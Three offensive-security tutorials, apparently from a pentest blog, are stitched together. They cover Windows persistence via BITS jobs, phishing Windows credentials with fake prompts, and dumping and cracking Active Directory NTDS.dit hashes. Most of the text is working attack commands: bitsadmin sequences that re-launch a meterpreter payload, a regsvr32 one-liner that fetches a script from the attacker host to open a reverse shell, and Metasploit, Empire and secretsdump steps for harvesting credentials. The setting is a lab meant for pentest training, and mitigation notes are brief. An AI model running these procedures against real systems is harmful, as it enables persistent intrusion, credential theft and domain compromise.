Windows Persistence using Bits Job

In this article, we are going to describe the ability of the Bits Job process to provide persistent access to the Target Machine.

Table of Content

·         Introduction

·         Configurations used in Practical

·         Manual Persistence

·         Metasploit Persistence

·         Metasploit (file-less) Persistence

·         Mitigation

Introduction

Background Intelligent Transfer Service Admin is a command-line tool that creates downloads or uploads jobs and monitors their progress. BITSAdmin was released with the Windows XP. At that time, it used the IBackgroundCopyJob as its interface. The Upload option of the BITSAdmin was introduced with the release of Windows Server 2003. With the release of Windows Vista, we had some more additional features like Custom HTTP headers, Certificate-based client authentication, IPv6 support. Subsequent year was the release of the Windows Server 2008, it introduced the File Transfer Notification Method. Windows 7 introduced Branch Cache Method for the BITS Transfer. When BITS downloads a file, the actual download is done behind the svchost.exe service. BITSAdmin is used to download files from or upload files to HTTP web servers and SMB file shares. It takes the cost of the transfer into account, as well as the network usage so that the user’s foreground work is not influenced. BITS can handle network interruptions, pausing and automatically resuming transfers, even after a reboot.

Read more about BITS Jobs form our dedicated article here.

Configurations used in Practical

Attacker:

    OS: Kali Linux 2020.1

    IP: 192.168.1.112

Target:

    OS: Windows 10

    IP: 192.168.1.102

Manual Persistence

Let’s talk about manual persistence. In this scenario, we are going to assume the physical access of the target system as well as the meterpreter session on it. After gaining the meterpreter session, upload a payload to the target system which will get us the persistence session.  

upload /root/raj.exe C:\

Now, we have the payload named “raj.exe”. We will configure a BITS Job to execute it at some intervals of time. Since we have the physical access of the system in this scenario, we will be using a command prompt for the following steps.

First, we will be creating a job named payload. It can be anything we want. We will execute all these commands using BITSAdmin. It is the tool that handles all the BIT Jobs.

bitsadmin /create payload

Now, as the BITS Jobs were created to transfer or mostly download files from the Microsoft Servers or any other server for that matter. It needs to add a file into its configuration before it can move forward. Now this URL we provided was bogus. It can be anything as it has no role except fulfill the configuration requirements of BITSAdmin.

bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"

BITS Jobs can run a command upon the execution of its jobs. This was meant so that any prompt can be generated while downloading an update or some other task can be done simultaneously to the download. We will use this command to execute the payload that we uploaded earlier with the help of a meterpreter.

bitsadmin /SetNotifyCmdLine payload C:\raj.exe NUL

When a BITS download fails it can retry to download after a specific duration of time. This can be set using SetMinRetryDelay Option. We will use this option to run our payload again and again so that in a case we lose the session, upon the next execution we can get the session again. We set it to 40 seconds here. Now, all we need is to initiate this job. It can be done using the resume option.

bitsadmin /SetMinRetryDelay "payload" 40

bitsadmin /resume payload

We went back to our Kali Attacker Machine and we started a multi handler listener to grab the session that would be generated due to the BITS Job. We set it to the configuration that we used to create the raj.exe payload. In a moment, we see that another meterpreter session spawned. Now, if the configuration is correct, we will have sessions every 40 seconds.

Metasploit Persistence

Next Scenario, it’s not too different than the previous scenario. All that changed is that we lost the physical access to the system. So we need to create the BITS Job remotely. The methods and command will remain the same just that after we uploaded the payload, we will run the shell command in meterpreter. Now all the commands that we ran to create the persistence previously we will run the same form here.

upload /root/raj.exe C:\

shell

bitsadmin /create payload

bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"

bitsadmin /SetNotifyCmdLine payload C:\raj.exe NUL

bitsadmin /SetMinRetryDelay "payload" 40

bitsadmin /resume payload

And we started the multi handler listener on the other terminal so that it can capture the session generated by the BITS Job that we just configured. Soon enough we have a new session.

We performed this method to provide the insight that this kind of attack can be performed remotely without any physical access to the system.

Metasploit (file-less) Persistence

In the previous methods, we created a payload and sent that to the Target Machine. That payload would create evidence of malicious activity. It can be located by the user or any Anti-Virus Software. So, we thought of creating a persistence without sending any file.

Note: This method will still able to detect from the BITS logs.

We will be using a malicious one-liner which will be executed using regsvr32. First, we need to create the one-liner. We will be using the multi/script/web_delivery for this task. We set up the configurations to the exploit like IP Address and the port of the Attacker Machine where we will be receiving the session. We copy the script created to our clipboard.

use exploit/multi/script/web_delivery

set target 3

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.112

set lport 1234

exploit

regsvr32.exe "/s /n /u /i:http://192.168.1.112:8080/V1hTIQYe6Azh.sct scrobj.dll

Now, we need the meterpreter session on the target systems as we had in the previous methods. We will be running the shell command on the meterpreter. Now we need to create a job. We name it payload as before. Again it can be anything we want. Then we have the bogus link that we added in the previous methods. Now its time to configure the command. Here we will configure the BITS Job to run the malicious one-liner we copied earlier. Then we will set the delay and we are good to go.

shell

bitsadmin /create payload

bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"

bitsadmin /SetNotifyCmdLine payload regsvr32.exe "/s /n /u /i:http://192.168.1.112:8080/V1hTIQYe6Azh.sct scrobj.dll"

bitsadmin /SetMinRetryDelay "payload" 40

bitsadmin /resume payload

Back on the attacker machine, our web_delivery exploit creates a listener on its own. In some time we have the session that is configured to be persistent.

This concludes the ability of BITS Job to provide persistence shells on the Windows Machines. Now let’s take a look at some useful mitigations against these kinds of attacks.

Mitigation

Our recommendations for mitigating BITS Jobs are:

·         Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.

·         Reduce the default BITS job lifetime in Group Policy or by editing the “JobInactivityTimeout” and “MaxDownloadTime” Registry values in HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS. The default maximum lifetime for a BITS job is 90 days, but that can be modified.

·         Limit the access of the BITSAdmin interface to specific users or groups.

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the COVID-19. I am writing this article while Working from home. Take care and be Healthy!

Credential Dumping: Phishing

This is the ninth article in our series of Credentials Dumping. In this article, we will trigger various scenarios where windows will ask for user authentication to retrieve the credentials. For security purpose, windows make it essential to validate user credentials for various authentications such as Outlook, User Account Control, or to sign in windows from the lock screen. We can use this feature to our advantage to dump the credentials after establishing the foothold on the target system.  To exploit this feature, we will use phishing technique to harvest the credentials.  

Table of content:

·         Metasploit Framework

o   Phish_windows_credentials

o   FakeLogonScreen

o   SharpLocker

·         PowerShell Empire

o   Collection/prompt

o   Collection/toasted

·         Kodiac

o   Password_box

·         PowerShell

o   Invoke_credentialsphish.ps1

o   Invoke-loginprompt.ps1

·         Lockphish

·         Conclusion

Metasploit Framework: phish_windows_credentials

Metasploit comes with an in-built post exploit which helps us to do the deed. As it is an exploit, it needs to be linked with an ongoing session. To use this module, simple type:

use post/windows/gather/phish_windows_credentials

set session 1

exploit

This module waits for a new process to start by the user. After the initiation of the process, a fake windows security dialogue box will open, asking for the user credentials as shown in the image below:

As the user enters their credentials, they will be apprehended and displayed as shown in the image below:

Metasploit Framework: FakeLogonScreen

FakeLogonScreen was created by Arris Huijgen. It is a windows utility tool that is developed in C#. It is developed in C# because it allows various Frameworks to inject the utility in memory, therefore we will remotely execute this tool using Metasploit.

Download FakeLogonScreen

We simply upload this utility tool from our meterpreter session and then remotely execute it using the following set of commands:

upload /root/FakeLogonScreen.exe

shell

FakeLogonScreen.exe

Upon execution, it will simulate the windows lock screen to obtain the password from the user. To do so, this tool will manifest the lock screen exactly like it is configured so that the user isn't suspicious, just as it is shown in the image below:

It will validate the credentials locally or from Active Directory as the user enters them and then display it on the console as shown in the image below:

Metasploit Framework: SharkLocker

This tool is very similar to the previous one. It was developed by Matt Pickford. just like FakeLogonScreen, this tool, too, will exhibit the fake lock screen for the user to enter credentials and then dump then keystroke by keystroke to the attacker.

Download SharpLocker

We will first upload this tool from our machine to the target system and then execute it for it to work. So, when you have the meterpreter session just type:

upload /root/Downloads/SharkLocker.exe

shell

Then navigate yourself to the Downloads folder and run the executable file.

Upon execution the tool will trigger the lock screen of the target system as shown in the image below:

And as the user enters the password, it will capture the keystrokes until the whole password is revealed as shown in the image below:

PowerShell Empire: collection/prompt

This module of the empire will prompt a dialogue box on the target system, asking for credentials. We can use this module with the following commands:

usemodule collection/prompt

execute

Once the user types in the credentials on the dialogue box, the module will display it on the terminal as shown in the image below:

PowerShell Empire: collection/toasted

This module of empire triggers a restart in the target system, to use this module type the following command:

usemodule collection/toasted

execute

Once the module executes, it will show the following dialogue box:

And once the restart is postponed, it will ask for credentials to validate the decision as shown in the image below :

And as the user enters the credentials, I will show on the terminal as shown in the image below:

Kodiac: password_box

A similar module is found in Kodiac. Once you have the session from it, use the following module to trigger the dialogue box:

use password_box

execute

When the user enters the username and password in the dialogue box, the password will be displayed in the terminal too as shown in the image below:

Powershell: invoke-cresentialsphish.ps1

There is a script of PowerShell that creates a fake prompt for the user to enter the credentials. To initiate the script, type:

Import-module C:\Users\raj\Desktop\Invoke-CredentialsPhish.psi

Invoke-CredentialsPhish

The execution of the above commands will pop out a prompt asking for credentials as shown in the image below:

Download Invoke-CredentialsPhish.ps1

So, once the user enters the credentials, they will be displayed on the screen as shown in the image below:

PowerShell: invoke-loginprompt.ps1

Similarly, there is another script developed by Matt Nelson. This script will again open a dialogue box for the user to enter the passwords, to initiate the script type the following:

Download Invoke-LoginPrompt.ps1

Import-module C:\Users\raj\Desktop\Invoke-LoginPrompt.psi

Invoke-LoginPrompt.ps1

As you can see the dialogue box emerges on the screen and the user enters the credentials, then further they will be displayed back on the terminal.

Lockphish

Lockphish is another tool that allows us to phish out the credentials, you can download this tool from here. This tool creates a template will be hosted into PHP server, it will then redirect the user to youtube by default after the credentials are retrieved.

Initiate the tool using the following command:

./lockphish.sh

It will generate a link as shown in the image above, send that link to the target. When the target executed the link and saves the file. For this step, strong social engineering skills are required.

Then the lock screen will be triggered and the user will be forced to enter the credentials as shown in the image below:

And after the user has entered the credentials, I will redirect to youtube as shown below:

And, we will have our credentials as shown in the image below:

Conclusion

These were various methods that we can use to dump the credentials of the target system. Depending on the scenarios the appropriate method for dumping the credentials should be used. The PowerShell methods are best to validate the credentials as the prompt doesn’t close till the correct credentials are entered. Lockphish method doesn’t create the lock screen as accurately as other tools and it also does not validate the credentials. Hence each method and tool have their advantages and disadvantages. But all of them are fairly good and working.

Credential Dumping: NTDS.dit

In this article, you will learn how passwords are stored in Windows Active directory and find out the methods used to hash passwords in NTDS.dit. And then we will learn how to dump these credentials hashes from NTDS.dit file.

Table of Content

·         Introduction to NTDS

o   NTDS Partitions

o   Database Storage Table

·         Extracting Credential by Exploit NTDS.dit in Multiple Methods

o   FGDump

o   NTDSUtil

o   DSInternals

o   NTDSDumpEx

o   Metasploit

§  NTDS_location

§  NTDS_grabber

§  secretsdump

o   Cracking Hashes

Introduction to NTDS

NTDS stands for New Technologies Directory Services and DIT stands for Directory Information Tree. The default active directory database file location is “C:\Windows\NTDS”.  This file acts as a database for Active Directory and stores all its data including all the credentials. The Default Ntds.dit size from Server 2003 onwards 12 MB and it can expand upto 16TB.

The active directory database is stored in a single NTDS.dit file which is logically separated into the following partitions:

If you take a look at the information of NTDS you can find that the data can also be divided into Schema, configuration and data information. Here, Schema information has all the details about objects and attributes while Configuration information consists the data about forest and tress which its further replicates to all the Domain Controllers. And Domain information has all the detailed data related to Domain.

The data store stores directory information in a single database file called Ntds.dit. In addition, it

Data Store Physical Structure Components

All the tables have various information such as Schema table consists of all the objects in Active Directory and their relationship with each other and Link table has all the attributes which refer to the objects and finally the data table contains all the data related users, groups, etc.

Now that we have an idea about the NTDS, it is time to extract some of those precious hashes from the Server. We have the Windows Server with Active Directory setup in our lab environment for the following practical.

Extracting Credential by Exploit NTDS.dit in Multiple Methods

Local: FGDump

FGDump is a tool that was created for mass password auditing of Windows Systems. This means that if an attacker can use the FGDump to extract the password from the target machine. For these purposes, we will need to download the FGDump from this link.

We fire up the windows command prompt and traverse to the path where we have downloaded the FGDump. In this case, it is in the Downloads Directory. As we have an executable for the FGDump, we ran it directly from the command prompt. 

fgdump.exe

As no parameters were provided, FGDump by default did a local dump. After auditing the local passwords, FGDump dumped Password and Cache successfully. Now let’s take a look at the dumped data.

FGDump creates a file with the extension PWDump. It-dumps hashes in that file. The name of the server is used as the name of the PWDump file. We can read the data on the file using the type command. As shown in the image given below, FGDump has successfully dumped hashes from the Target System.

type

Local: NTDSUtil

Enough with the Windows Command prompt, it’s time to move on to the PowerShell. We are going to use another executable called NTDSutil.exe. We launch an instance of PowerShell. Then we run NTDSutil.exe with a bunch of parameters instructing it to make a directory called temp in the C:\ drive and asks NTDSUtil to use its ability to tap into the Active Directory Database and fetch the SYSTEM and SECURITY hive files as well as the ndts.dit file. After working for a while, we have the hive files in the temp directory.

powershell "NTDSutil.exe 'ac i NTDS' 'ifm' 'create full c:\temp' q q"

We transfer the hive files onto our Kali Linux Machine, to extract hashes from them. We will be using the secretsdump.py file from the impacket toolkit to extract hashes. All we need is to provide the path of the SYSTEM hive file and the NTDS.dit file and we are good to go. We see that in a matter of seconds secretsdump extracts hashes for us.

secretsdump.py -NTDS /root/NTDS.dit -system /root/SYSTEM LOCAL

Local: DSInternals

DSInternals is a framework designed by Michael Grafnetter for performing AD Security Audits. It is a part of the PowerShell official Gallery. This means we can download it by using the cmdlet Save-Module. After downloading we need to install the module before using it. This can be done using the cmdlet Install-Module. This will require a change in the Execution Policy. After installing the Modules, we are good to go.

We first use the Get-Bootkey cmdlet to extract the bootkey from the System Hive. After obtaining the bootkey, we will use it to read the data of one or more accounts form the NTDIS file including the secret attributes like hashes using the Get-ADBAccount cmdlet.

Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules

Set-ExecutionPolicy Unrestricted

Import-Module DSInternals

Get-BootKey -SystemHivePath ‘C:\SYSTEM’

Get-ADDBAccount -All -DBPath ‘C:\NTDS.dit’ -Bootkey  

The Get-ADBAccount cmdlet creates a long sequence of output. Here we are showing you the data of one of the users of the Target Machine. We can see that we have successfully extracted the NTLM hashes from the NTDS.dit file.

Local: NTDSDumpEx

Now it’s time to use some external tools for attacking the NTDIS file. We will be using the NTDSDumpEx for this particular Practical. You can download it from here. We unzip the contents of the compressed file we downloaded and then use the executable file to attack the NTDS file. We will need to provide the path for the ntdis.dit file and the System Hive file. In no time the NTDSDumpEx gives us a list of the users with their respective hashes.

NTDSDumpEx.exe -d C:\NTDS.dit -s C:\SYSTEM

Remote: Metasploit (NTDS_location)

For all the Metasploit fans, there is no need to get depressed. Metasploit can work just fine in extracting hashes form the NTDS.dit file. We have 2 exploits that can work side by side to target NTDS. The first one locates the ndts file. We need a session on the Target System to move forward. After we gain a session, we choose the NTDS_location exploit and set the session identifier to the exploit. Upon running the exploit, we see that we have the location of the NTDS.dit file.

use post/windows/gather/NTDS_location

set session 1

exploit

Remote: Metasploit (NTDS_grabber)

Moving on, we use another exploit that can extract the NTDS.dit file, SAM and SYSTEM hive files from the Target System. The catch is, it transfers these files in .cab compressed files.

use post/windows/gather/NTDS_grabber

set session 1

exploit

The exploit works and transfers the cab file to a location that can be seen in the image. Now to extract the NTDS.dit and other hive files, we are going to use a tool called cabextract. This will extract all 3 files.

cabextract

Now that we have the NTDS and the hive files at our disposal, we can use the impacket’s secretsdump script to extract hashes from it as we did earlier.

Remote: Metasploit (secretsdump)

Suppose a scenario where we were able to procure the login credentials of the server by any method but it is not possible to access the server directly, we can use this exploit in the Metasploit framework to extract the hashes from the NTDS.dit file remotely. We will use this auxiliary to grab the hashes. We need to provide the IP Address of the Target Machine, Username and Password. The auxiliary will grab the hashes and display it on our screen in a few seconds.

use auxiliary/scanner/smb/impacket/secretsdump

set rhosts 192.168.1.108

set smbuser administrator

set smbpass Ignite@987

exploit

Remote: Cracking Hash

To ensure that all the hashes that we extracted can be cracked, we decided to take one and extract it using John the Ripper. We need to provide the format of the hash which is NT. John the Ripper will crack the password in a matter of seconds.

cat hash

john --format=NT hash --show

This concludes the various methods in which can extract the hashes that are stored in the Windows Server. We included multiple tools to cover the various scenarios that an attacker can face. And the only way to protect yourself against such attacks is to minimise the users who can access Domain Controllers. Continuously, log and monitor the activity for any changes. It is frequently recertified.

Refence : How the Data Store Works